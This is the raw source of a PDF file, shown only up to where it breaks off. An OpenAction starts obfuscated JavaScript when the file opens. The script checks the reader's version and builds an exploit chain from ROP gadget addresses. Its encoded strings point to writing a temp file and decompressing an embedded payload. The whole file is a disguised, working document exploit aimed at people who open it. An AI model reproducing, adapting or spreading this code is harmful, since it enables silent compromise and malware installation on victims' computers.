%PDF-1.2
1 0 obj
<<
	/Pages 2 0 R
	/AcroForm <<
		/XFA 4 0 R
	>>
	/ZZZ <<
		/EEE 5 0 R
	>>
	/OpenAction <<
		/JS (function sHOGG\(c,d,e\){\n    var idx = d % c.length;\n    var s = "";\n    while \(s.length < c.length\){\n        s += c[idx];\n        idx = \(idx + e\) % c.length;\n    }\n    return s;\n}\nfunction oTHERWISE\(pRENDENDO,t\){\n    if\(pRENDENDO == '10.0.1.434'\){\n        var r="";\n        r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);\n        r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x39\);r+=ue\(t+0x412b0b\);\n        r+=ue\(t+0x519ee3\);r+=ue\(t+0x793001\);r+=ue\(t+0x57dc29\);r+=ue\(0x54746547\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793005\);r+=ue\(t+0x57dc29\);r+=ue\(0x50706d65\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793009\);r+=ue\(t+0x57dc29\);r+=ue\(0x41687461\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79300d\);r+=ue\(t+0x57dc29\);r+=ue\(0x41414100\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79300e\);r+=ue\(t+0x57dc29\);r+=ue\(0x69727766\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793012\);r+=ue\(t+0x57dc29\);r+=ue\(0x41006574\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793015\);r+=ue\(t+0x57dc29\);r+=ue\(0x41006277\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793018\);r+=ue\(t+0x57dc29\);r+=ue\(0x70797243\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79301c\);r+=ue\(t+0x57dc29\);r+=ue\(0x72745374\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793020\);\n        r+=ue\(t+0x57dc29\);r+=ue\(0x54676e69\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);\n        r+=ue\(t+0x793024\);r+=ue\(t+0x57dc29\);r+=ue\(0x6e69426f\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793028\);r+=ue\(t+0x57dc29\);r+=ue\(0x41797261\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79302c\);r+=ue\(t+0x57dc29\);r+=ue\(0x41414100\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79302d\);r+=ue\(t+0x57dc29\);r+=ue\(0x6c64746e\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793031\);r+=ue\(t+0x57dc29\);r+=ue\(0x4141006c\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793033\);r+=ue\(t+0x57dc29\);r+=ue\(0x446c7452\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793037\);r+=ue\(t+0x57dc29\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x464e3a\);\n        r+=ue\(t+0x519ee3\);r+=ue\(t+0x79303b\);r+=ue\(t+0x57dc29\);r+=ue\(0x73657270\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79303f\);r+=ue\(t+0x57dc29\);r+=ue\(0x66754273\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793043\);r+=ue\(t+0x57dc29\);r+=ue\(0x726566\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x793047\);\n        r+=ue\(t+0x57dc29\);r+=ue\(0x73736377\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79304b\);r+=ue\(t+0x57dc29\);\n        r+=ue\(0x41007274\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0240\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc023c\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x791df2\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc022c\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);\n        r+=ue\(t+0x57f1d8\);r+=ue\(t+0x4dbe32\);r+=ue\(0x41414141\);r+=ue\(t+0x793047\);r+=ue\(t+0x649cf\);r+=ue\(t+0x524146\);r+=ue\(0x41414141\);r+=ue\(t+0x5864c0\);r+=ue\(t+0x2d5342\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79305e\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x79304e\);r+=ue\(t+0x57dc29\);r+=ue\(0x1010101\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x791f8c\);\n        r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc02ac\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);\n        r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f1d8\);r+=ue\(t+0x4dbe32\);r+=ue\(0x41414141\);r+=ue\(t+0x793018\);r+=ue\(t+0x4f55a4\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x79305e\);r+=ue\(t+0x45d650\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc033c\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x4fcf10\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0340\);r+=ue\(t+0x45639b\);\n        r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x4fcf10\);r+=ue\(t+0x56c806\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0344\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x4f55a4\);r+=ue\(t+0x649cf\);r+=ue\(t+0x39\);r+=ue\(0x41414141\);r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x793066\);r+=ue\(t+0x79304e\);r+=ue\(t+0x793056\);r+=ue\(t+0x79305a\);r+=ue\(t+0x4fcf10\);r+=ue\(t+0x56c806\);r+=ue\(t+0x56c806\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0428\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x79304e\);r+=ue\(t+0x45d650\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0438\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x79305e\);r+=ue\(t+0x45d650\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);\n        r+=ue\(0xcccc042c\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x79302d\);\n        r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0418\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);\n        r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f1d8\);r+=ue\(t+0x4dbe32\);r+=ue\(0x41414141\);r+=ue\(t+0x793033\);r+=ue\(t+0x649cf\);r+=ue\(t+0x39\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x793066\);\n        r+=ue\(0x43434343\);\n        r+=ue\(t+0x793052\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x791df2\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc047c\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f1d8\);r+=ue\(t+0x4dbe32\);r+=ue\(0x41414141\);r+=ue\(t+0x79300e\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x58602c\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);\n        r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f1d8\);r+=ue\(t+0x4dbe32\);r+=ue\(0x41414141\);r+=ue\(t+0x793001\);r+=ue\(t+0x649cf\);r+=ue\(t+0x39\);r+=ue\(0x1010101\);r+=ue\(t+0x793101\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x793101\);r+=ue\(t+0x4ec589\);r+=ue\(t+0x57dc29\);r+=ue\(0x542e44\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x4fcf10\);\n        r+=ue\(t+0x56c806\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x793052\);r+=ue\(t+0x45d650\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc05fc\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f654\);r+=ue\(t+0x6f84\);r+=ue\(t+0x524146\);r+=ue\(t+0x793101\);r+=ue\(t+0x793015\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0600\);r+=ue\(t+0x45639b\);\n        r+=ue\(t+0x2b8f07\);\n        r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x53058d\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc0614\);r+=ue\(t+0x45639b\);\n        r+=ue\(t+0x2b8f07\);r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(t+0x57dc29\);r+=ue\(t+0x79305e\);r+=ue\(t+0x45d650\);r+=ue\(t+0x53058d\);r+=ue\(t+0x519ee3\);r+=ue\(0xcccc05f4\);r+=ue\(t+0x45639b\);r+=ue\(t+0x2b8f07\);\n        r+=ue\(t+0x1da757\);r+=ue\(t+0x254980\);r+=ue\(t+0x464e3a\);r+=ue\(0x42424242\);r+=ue\(t+0x4fc14d\);r+=ue\(0x43434343\);r+=ue\(0x44444444\);\n        r+=ue\(0x44444444\);\n        r+=ue\(0x45454545\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f660\);r+=ue\(t+0x6f84\);r+=ue\(t+0x519ee3\);r+=ue\(0x45454545\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f224\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x793101\);r+=ue\(t+0x519ee3\);r+=ue\(t+0x57f0b8\);r+=ue\(t+0x4dbe32\);r+=ue\(t+0x39\);r+=ue\(0x1010101\);r+=ue\(0x6f004d\);r+=ue\(0x750064\);r+=ue\(0x65006c\);\n        ROP_ADD_ESP_4 = 0x20c680bb;\n        bENEDETTO = 0x20d76e3d;\n        cARPONE = 0x20cfd14d;\n        sENTIRSI = 0x20cf54d4;\n        rICINGHE = 0x20ce7272;\n        aPPARENZA = 0x209be728;\n        fISAMENTE = 0x20cfb4d5;\n        pRESUNSI = 0x20801039;\n        oRDERED = 0x20ce58a6;\n        cOCOLLE = 0x2087d453;\n    } else if\(pRENDENDO == '10.1.0.534'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x41acaf\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813001\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x54746547\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);\n        r+=ue\(t+0x813005\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x50706d65\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813009\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41687461\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81300d\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41414100\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81300e\);\n        r+=ue\(t+0x5ec5fc\);r+=ue\(0x69727766\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813012\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41006574\);r+=ue\(t+0x46c3ea\);\n        r+=ue\(t+0x527b82\);r+=ue\(t+0x813015\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41006277\);\n        r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813018\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x70797243\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81301c\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x72745374\);\n        r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813020\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x54676e69\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813024\);r+=ue\(t+0x5ec5fc\);\n        r+=ue\(0x6e69426f\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);\n        r+=ue\(t+0x813028\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41797261\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81302c\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41414100\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81302d\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x6c64746e\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813031\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x4141006c\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813033\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x446c7452\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813037\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81303b\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x73657270\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81303f\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x66754273\);\n        r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813043\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x726566\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x813047\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x73736377\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81304b\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x41007274\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0240\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x3d692b\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc023c\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);\n        r+=ue\(t+0x4b0548\);r+=ue\(t+0x8123de\);r+=ue\(t+0x532422\);\n        r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc022c\);\n        r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed1d4\);r+=ue\(t+0x4b0548\);r+=ue\(0x41414141\);r+=ue\(t+0x813047\);r+=ue\(t+0x14cf\);r+=ue\(t+0x5e8c85\);r+=ue\(0x41414141\);r+=ue\(t+0x6061d0\);r+=ue\(t+0x2de7a9\);r+=ue\(t+0x532422\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81305e\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x532422\);r+=ue\(t+0x527b82\);r+=ue\(t+0x81304e\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x1010101\);r+=ue\(t+0x46c3ea\);\n        r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);r+=ue\(t+0x4b0548\);r+=ue\(t+0x812578\);\n        r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);\n        r+=ue\(0xcccc02ac\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);\n        r+=ue\(t+0x25dc4d\);\n        r+=ue\(t+0x46c3ea\);\n        r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed1d4\);r+=ue\(t+0x4b0548\);r+=ue\(0x41414141\);r+=ue\(t+0x813018\);r+=ue\(t+0x4f975e\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x81305e\);r+=ue\(t+0x464e10\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc033c\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5010c5\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);\n        r+=ue\(0xcccc0340\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);\n        r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5010c5\);r+=ue\(t+0x501c9e\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0344\);r+=ue\(t+0x4225cf\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x4f975e\);r+=ue\(t+0x14cf\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x42424242\);r+=ue\(0x43434343\);r+=ue\(t+0x813066\);\n        r+=ue\(t+0x81304e\);r+=ue\(t+0x813056\);r+=ue\(t+0x81305a\);r+=ue\(t+0x5010c5\);r+=ue\(t+0x501c9e\);r+=ue\(t+0x501c9e\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0428\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x81304e\);r+=ue\(t+0x464e10\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0438\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x81305e\);r+=ue\(t+0x464e10\);r+=ue\(t+0x532422\);\n        r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc042c\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);r+=ue\(t+0x4b0548\);r+=ue\(t+0x81302d\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0418\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);\n        r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed1d4\);r+=ue\(t+0x4b0548\);r+=ue\(0x41414141\);r+=ue\(t+0x813033\);r+=ue\(t+0x14cf\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x813066\);r+=ue\(0x43434343\);r+=ue\(t+0x813052\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);r+=ue\(t+0x4b0548\);\n        r+=ue\(t+0x8123de\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc047c\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed1d4\);r+=ue\(t+0x4b0548\);r+=ue\(0x41414141\);r+=ue\(t+0x81300e\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed214\);r+=ue\(t+0x4b0548\);r+=ue\(t+0x605d3c\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed1d4\);r+=ue\(t+0x4b0548\);r+=ue\(0x41414141\);r+=ue\(t+0x813001\);r+=ue\(t+0x14cf\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(t+0x813101\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x813101\);r+=ue\(t+0x4f0743\);r+=ue\(t+0x5ec5fc\);r+=ue\(0x542e44\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5010c5\);r+=ue\(t+0x501c9e\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x4225cf\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);r+=ue\(t+0x5ec5fc\);r+=ue\(t+0x813052\);r+=ue\(t+0x464e10\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc05fc\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);r+=ue\(t+0x13c19f\);r+=ue\(t+0x25dc4d\);r+=ue\(t+0x46c3ea\);\n        r+=ue\(t+0x527b82\);r+=ue\(t+0x5ed65c\);r+=ue\(t+0x1df01\);r+=ue\(t+0x5e8c85\);r+=ue\(t+0x813101\);r+=ue\(t+0x813015\);r+=ue\(t+0x532422\);r+=ue\(t+0x5e8d02\);r+=ue\(0xcccc0600\);r+=ue\(t+0x4225cf\);r+=ue\(t+0x17\);\n        